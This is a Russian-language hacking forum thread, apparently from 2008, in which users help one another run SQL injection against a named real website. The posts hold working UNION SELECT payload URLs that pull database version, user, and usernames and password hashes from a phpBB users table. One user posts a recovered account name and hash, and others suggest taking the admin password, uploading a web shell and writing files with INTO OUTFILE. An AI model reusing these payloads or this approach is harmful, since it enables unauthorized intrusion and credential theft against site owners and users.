Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),6,7,8,9/* кто поможет выудить пасс к мусклу если чо вот удалённый доступ к мусклу http://81.177.9.37:911/administration/mysql/index.php
     
  2. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    superboys, прав не хватит на чтение mysql.user
     
  3. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    это в каком сообщение 1 или 2?)
     
  4. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Ко второму.
    К первому нужны права на чтение файлов.
     
  5. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    ппц, а чо ещё можно сделать? Кроме как ддосить, крашить и т.д.
     
  6. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Оставь как есть или напиши администратору о дырке.
     
  7. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    можно узнать пароль админа на форуме
    потом через форум можно залить шелл .. и будет тебе счастье :)

    попробуй такие идеи
    http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),6,7,8,9/*

    это для технической информации

    также можешь узнать пароль и имена пользователей
    таблица
    phpbb_users
    поля
    username
    user_password
     
  8. Glazz

    Glazz Elder - Старейшина

    Joined:
    9 Aug 2008
    Messages:
    116
    Likes Received:
    7
    Reputations:
    0
    может кто показать , как заливают фаил через load_file() в скл инъекции .
     
  9. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Вот отличная статья, там все написано https://forum.antichat.ru/showthread.php?t=19605
    Смотри пункт
    4)Получить шелл


    Ах да, файл НЕ заливают через LOAD_FILE() его читают. А заливают через into+outfile+'/ПУТЬ/ИМЯ_ФАЙЛА'
     
    #2929 Red_Red1, 12 Aug 2008
    Last edited: 12 Aug 2008
  10. Glazz

    Glazz Elder - Старейшина

    Joined:
    9 Aug 2008
    Messages:
    116
    Likes Received:
    7
    Reputations:
    0
    спасибо , почитаю.
    А ИМЯ_ФАЙЛА(путь) на моем компе , или на его? и заливается , то куда?
     
  11. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    тут 4 версия мы можем только подобрать таблицы. information_schema.tables есть только в 5 версии и выше
     
  12. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    по твоей подсказке сделал такой запрос http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+select+1,2,3,4,username,user_password,7,8,9+from+phpbb_users/* но почемут не видно данных базы.
     
  13. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    скорей сего шифрование _ пробывал с декриптом ваще ошибка(
     
  14. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    hex, aes_encrypt
     
  15. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Юзай лимит Х,Х
    http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+select+1,2,3,4,username,user_password,7,8,9+from+phpbb_users+limit+1,1/*
     
    1 person likes this.
  16. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    да хоть бы показал синтаксис)
     
  17. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    спс Ред_Ред1
     
  18. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    а маны кто будет читать ?
     
  19. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    в манах такого нет) Да ужо всё наашёл хэш Lupo:b7dba5a1bc3605a87b59ac8147512c97
     
  20. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    piton;526635

    дай форум залью шелл )
     
    #2940 sabe, 12 Aug 2008
    Last edited: 13 Aug 2008
    1 person likes this.
Thread Status:
Not open for further replies.